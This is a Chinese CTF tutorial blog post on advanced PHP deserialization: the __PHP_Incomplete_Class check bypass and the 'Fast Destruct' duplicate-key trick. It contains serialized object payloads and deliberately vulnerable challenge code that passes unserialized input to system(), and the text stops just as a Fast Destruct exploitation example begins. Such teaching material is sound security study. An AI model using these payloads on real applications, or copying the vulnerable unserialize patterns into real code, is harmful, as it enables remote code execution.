

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=light>


<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-G582PR7P29"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'G-G582PR7P29');
</script>
<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="kivvs">
  <meta name="keywords" content="">
  
    <meta name="description" content="PHP 反序列化进阶：不完整类、Fast Destruct 与 CallablePHP 反序列化题的基础利用通常围绕魔术方法展开，例如 __wakeup()、__destruct()、__toString()。但在 CTF 题目中，单纯会构造对象 payload 往往不够，还需要理解一些进阶技巧。 本文整理三个常见进阶点：  __PHP_Incomplete_Class：类不存在时如何绕过检查。">
<meta property="og:type" content="article">
<meta property="og:title" content="反序列化进阶">
<meta property="og:url" content="https://kivvs.github.io/2026/08/14/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%BF%9B%E9%98%B6/index.html">
<meta property="og:site_name" content="kivvs">
<meta property="og:description" content="PHP 反序列化进阶：不完整类、Fast Destruct 与 CallablePHP 反序列化题的基础利用通常围绕魔术方法展开，例如 __wakeup()、__destruct()、__toString()。但在 CTF 题目中，单纯会构造对象 payload 往往不够，还需要理解一些进阶技巧。 本文整理三个常见进阶点：  __PHP_Incomplete_Class：类不存在时如何绕过检查。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-08-14T09:55:00.000Z">
<meta property="article:modified_time" content="2026-08-14T09:55:54.888Z">
<meta property="article:author" content="kivvs">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>反序列化进阶 - kivvs</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"kivvs.github.io","root":"/","version":"1.9.9","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"expand_all":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null,"gtag":"G-G582PR7P29"},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"openkounter":{"server_url":"https://open-kounter.mintimate.cn","path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  
    
  




  
<meta name="generator" content="Hexo 8.1.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>kivvs</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content (desktop) -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

<!-- Mobile grid menu overlay -->
<div id="mobile-grid-menu" class="d-lg-none">
  <div class="mobile-grid-menu-inner">
    <div class="container">
      <div class="row">
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-home-fill"></i>
                  <span>首页</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/archives/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-archive-fill"></i>
                  <span>归档</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/categories/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-category-fill"></i>
                  <span>分类</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/tags/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-tags-fill"></i>
                  <span>标签</span>
                </div>
              </a>
            </div>
          
        
          
          
          
          
            <div class="col-4 mobile-grid-cell">
              <a href="/about/" target="_self">
                <div class="mobile-grid-item">
                  <i class="iconfont icon-user-fill"></i>
                  <span>关于</span>
                </div>
              </a>
            </div>
          
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-search-btn">
            <a href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <div class="mobile-grid-item">
                <i class="iconfont icon-search"></i>
                <span>搜索</span>
              </div>
            </a>
          </div>
        
        
          <div class="col-4 mobile-grid-cell" id="mobile-color-toggle-btn"
               data-label-light="开灯"
               data-label-dark="关灯">
            <a href="javascript:;" aria-label="Color Toggle">
              <div class="mobile-grid-item">
                <i class="iconfont icon-dark" id="mobile-color-toggle-icon"></i>
                <span id="mobile-color-toggle-label">关灯</span>
              </div>
            </a>
          </div>
        
      </div>
    </div>
  </div>
</div>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="反序列化进阶"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-08-14 17:55" pubdate>
          2026年8月14日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          9.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          80 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>



</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">反序列化进阶</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="PHP-反序列化进阶：不完整类、Fast-Destruct-与-Callable"><a href="#PHP-反序列化进阶：不完整类、Fast-Destruct-与-Callable" class="headerlink" title="PHP 反序列化进阶：不完整类、Fast Destruct 与 Callable"></a>PHP 反序列化进阶：不完整类、Fast Destruct 与 Callable</h1><p>PHP 反序列化题的基础利用通常围绕魔术方法展开，例如 <code>__wakeup()</code>、<code>__destruct()</code>、<code>__toString()</code>。但在 CTF 题目中，单纯会构造对象 payload 往往不够，还需要理解一些进阶技巧。</p>
<p>本文整理三个常见进阶点：</p>
<ul>
<li><code>__PHP_Incomplete_Class</code>：类不存在时如何绕过检查。</li>
<li>Fast Destruct：如何让 <code>__destruct()</code> 提前触发。</li>
<li>Callable：如何把可控属性当成函数或方法调用。</li>
</ul>
<p>这三个点经常单独出现，也可以组合进同一条利用链。</p>
<h2 id="1-PHP-不完整类"><a href="#1-PHP-不完整类" class="headerlink" title="1. PHP 不完整类"></a>1. PHP 不完整类</h2><h3 id="1-1-PHP-Incomplete-Class"><a href="#1-1-PHP-Incomplete-Class" class="headerlink" title="1.1 __PHP_Incomplete_Class"></a>1.1 __PHP_Incomplete_Class</h3><p>PHP 在反序列化对象时，如果当前环境里找不到目标类，就不会还原出真实对象，而是生成一个特殊对象：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-built_in">__PHP_Incomplete_Class</span><br></code></pre></td></tr></table></figure>

<p>例如 payload：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;User&quot;:1:&#123;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;&#125;<br></code></pre></td></tr></table></figure>

<p>如果当前代码中没有定义 <code>User</code> 类：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$x</span> = <span class="hljs-string">&#x27;O:4:&quot;User&quot;:1:&#123;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;&#125;&#x27;</span>;<br><span class="hljs-variable">$obj</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>);<br><span class="hljs-title function_ invoke__">var_dump</span>(<span class="hljs-variable">$obj</span>);<br></code></pre></td></tr></table></figure>

<p>结果类似：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs text">object(__PHP_Incomplete_Class) &#123;<br>  [&quot;__PHP_Incomplete_Class_Name&quot;] =&gt; &quot;User&quot;<br>  [&quot;role&quot;] =&gt; &quot;admin&quot;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>重点有三个：</p>
<ul>
<li>它不是 <code>User</code> 对象。</li>
<li>它不会触发 <code>User</code> 的魔术方法。</li>
<li>它仍然保存原类名和属性。</li>
</ul>
<p>所以，不完整类不是“反序列化失败”，而是 PHP 用一种特殊对象保留了原对象信息。</p>
<h3 id="1-2-常见场景"><a href="#1-2-常见场景" class="headerlink" title="1.2 常见场景"></a>1.2 常见场景</h3><p>常见情况有两种。</p>
<p>第一种：类没有定义或没有加载。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$obj</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-string">&#x27;O:4:&quot;User&quot;:1:&#123;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;&#125;&#x27;</span>);<br></code></pre></td></tr></table></figure>

<p>如果执行到这里时 <code>User</code> 类不存在，就会得到 <code>__PHP_Incomplete_Class</code>。</p>
<p>第二种：使用了 <code>allowed_classes</code> 限制。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$obj</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>, [<span class="hljs-string">&#x27;allowed_classes&#x27;</span> =&gt; <span class="hljs-literal">false</span>]);<br></code></pre></td></tr></table></figure>

<p>这会禁止对象还原成真实类，对象会变成不完整类。</p>
<p>也可能是白名单不包含目标类：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$obj</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>, [<span class="hljs-string">&#x27;allowed_classes&#x27;</span> =&gt; [<span class="hljs-string">&#x27;SafeClass&#x27;</span>]]);<br></code></pre></td></tr></table></figure>

<p>如果 payload 里是 <code>User</code>，但白名单只有 <code>SafeClass</code>，也会生成不完整类。</p>
<h3 id="1-3-绕过原理"><a href="#1-3-绕过原理" class="headerlink" title="1.3 绕过原理"></a>1.3 绕过原理</h3><p>CTF 里常见这种检查：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>)) != <span class="hljs-variable">$x</span>) &#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;bad&#x27;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这个检查想确认：用户传入的序列化字符串经过 PHP 解析后，再重新序列化，是否还能保持原样。</p>
<p>它可以拦一些不规范 payload，例如尾部垃圾数据：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;User&quot;:1:&#123;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;&#125;aaaa<br></code></pre></td></tr></table></figure>

<p><code>unserialize()</code> 可能只解析前面的合法部分，但 <code>serialize()</code> 不会保留尾部 <code>aaaa</code>，所以前后字符串不一致，检查失败。</p>
<p>但是如果目标类在检查阶段不存在，情况就不同了。</p>
<p>假设 payload 是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;User&quot;:1:&#123;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;&#125;<br></code></pre></td></tr></table></figure>

<p>检查阶段执行：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>)<br></code></pre></td></tr></table></figure>

<p>由于 <code>User</code> 类不存在，得到的是：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-built_in">__PHP_Incomplete_Class</span><br></code></pre></td></tr></table></figure>

<p>但这个不完整类内部保留：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">__PHP_Incomplete_Class_Name = User<br>role = admin<br></code></pre></td></tr></table></figure>

<p>再执行：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>))<br></code></pre></td></tr></table></figure>

<p>PHP 很多情况下会重新输出原始对象格式：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;User&quot;:1:&#123;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;&#125;<br></code></pre></td></tr></table></figure>

<p>因此：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>)) == <span class="hljs-variable">$x</span><br></code></pre></td></tr></table></figure>

<p>可以成立。</p>
<p>这就是不完整类绕过该检查的核心。</p>
<h3 id="1-4-典型题目结构"><a href="#1-4-典型题目结构" class="headerlink" title="1.4 典型题目结构"></a>1.4 典型题目结构</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$x</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;x&#x27;</span>];<br><br><span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>)) != <span class="hljs-variable">$x</span>) &#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;bad&#x27;</span>);<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">User</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$role</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-variable language_">$this</span>-&gt;role === <span class="hljs-string">&#x27;admin&#x27;</span>) &#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;flag&#x27;</span>;<br>        &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$x</span>);<br></code></pre></td></tr></table></figure>

<p>执行链路：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs text">payload 是 User 对象<br>  -&gt; 检查阶段 User 类还没有定义<br>  -&gt; unserialize($x) 得到 __PHP_Incomplete_Class<br>  -&gt; serialize() 恢复原始 User payload<br>  -&gt; 检查通过<br>  -&gt; 后面定义 User 类<br>  -&gt; 再次 unserialize($x)<br>  -&gt; User 被真实实例化<br>  -&gt; 请求结束触发 __destruct()<br></code></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;User&quot;:1:&#123;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;&#125;<br></code></pre></td></tr></table></figure>

<p>这里真正重要的是类加载顺序：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">检查阶段：目标类不存在<br>利用阶段：目标类存在<br></code></pre></td></tr></table></figure>

<h2 id="2-Fast-Destruct"><a href="#2-Fast-Destruct" class="headerlink" title="2. Fast Destruct"></a>2. Fast Destruct</h2><h3 id="2-1-简介"><a href="#2-1-简介" class="headerlink" title="2.1 简介"></a>2.1 简介</h3><p>Fast Destruct 是 PHP 反序列化利用中的一个触发时机技巧。</p>
<p>它的作用是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">让对象的 __destruct() 提前触发，而不是等到脚本结束时才触发。<br></code></pre></td></tr></table></figure>

<p>正常情况下，对象的 <code>__destruct()</code> 通常在对象生命周期结束时执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Evil</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;destruct&#x27;</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$obj</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Evil</span>();<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;hello&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>输出顺序一般是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs text">hello<br>destruct<br></code></pre></td></tr></table></figure>

<p>因为 <code>$obj</code> 一直存活到脚本结束。</p>
<p>Fast Destruct 要做的事情就是：让对象在反序列化过程中或刚反序列化完成时失去引用，从而提前析构。</p>
<h3 id="2-2-核心原理"><a href="#2-2-核心原理" class="headerlink" title="2.2 核心原理"></a>2.2 核心原理</h3><p>PHP 对象触发析构的关键条件是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">对象没有任何引用时，会被销毁，并调用 __destruct()<br></code></pre></td></tr></table></figure>

<p>Fast Destruct 最经典的方式是数组重复键覆盖。</p>
<p>payload 模板：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">a:2:&#123;i:0;对象payload;i:0;N;&#125;<br></code></pre></td></tr></table></figure>

<p>例如目标对象：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;Evil&quot;:1:&#123;s:3:&quot;cmd&quot;;s:2:&quot;id&quot;;&#125;<br></code></pre></td></tr></table></figure>

<p>Fast Destruct 版本：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">a:2:&#123;i:0;O:4:&quot;Evil&quot;:1:&#123;s:3:&quot;cmd&quot;;s:2:&quot;id&quot;;&#125;i:0;N;&#125;<br></code></pre></td></tr></table></figure>

<p>这个数组可以理解为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php">[<br>    <span class="hljs-number">0</span> =&gt; <span class="hljs-keyword">new</span> <span class="hljs-title class_">Evil</span>(),<br>    <span class="hljs-number">0</span> =&gt; <span class="hljs-literal">null</span>,<br>]<br></code></pre></td></tr></table></figure>

<p>两个元素的 key 都是 <code>0</code>。</p>
<p>PHP 反序列化时大致过程是：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs text">1. 创建 Evil 对象，放到数组 key 0<br>2. 继续解析第二个 key 0<br>3. 第二个 key 0 的值是 null<br>4. null 覆盖原来的 Evil 对象<br>5. Evil 对象失去引用<br>6. 立即触发 Evil::__destruct()<br></code></pre></td></tr></table></figure>

<p>所以它叫 Fast Destruct，快速析构。</p>
<h3 id="2-3-实例"><a href="#2-3-实例" class="headerlink" title="2.3 实例"></a>2.3 实例</h3><p>题目代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Evil</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$cmd</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27;__destruct: &#x27;</span> . <span class="hljs-variable language_">$this</span>-&gt;cmd;<br>    &#125;<br>&#125;<br><br><span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;data&#x27;</span>]);<br><span class="hljs-keyword">echo</span> <span class="hljs-string">&#x27; after unserialize &#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>普通 payload：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">O:4:&quot;Evil&quot;:1:&#123;s:3:&quot;cmd&quot;;s:2:&quot;id&quot;;&#125;<br></code></pre></td></tr></table></figure>

<p>常见执行顺序：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">after unserialize __destruct: id<br></code></pre></td></tr></table></figure>

<p>Fast Destruct payload：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">a:2:&#123;i:0;O:4:&quot;Evil&quot;:1:&#123;s:3:&quot;cmd&quot;;s:2:&quot;id&quot;;&#125;i:0;N;&#125;<br></code></pre></td></tr></table></figure>

<p>执行顺序会变成：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">__destruct: id after unserialize<br></code></pre></td></tr></table></figure>

<p>也就是析构方法提前执行了。</p>
<h3 id="2-4-CTF-中的利用"><a href="#2-4-CTF-中的利用" class="headerlink" title="2.4 CTF 中的利用"></a>2.4 CTF 中的利用</h3><p>Fast Destruct 常用于抢在后续逻辑之前触发 <code>__destruct()</code>。</p>
<p>例如题目代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Evil</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$cmd</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-variable">$this</span>-&gt;cmd);<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$obj</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;data&#x27;</span>]);<br><span class="hljs-variable">$obj</span>-&gt;cmd = <span class="hljs-string">&#x27;whoami&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p>普通 payload：</p>
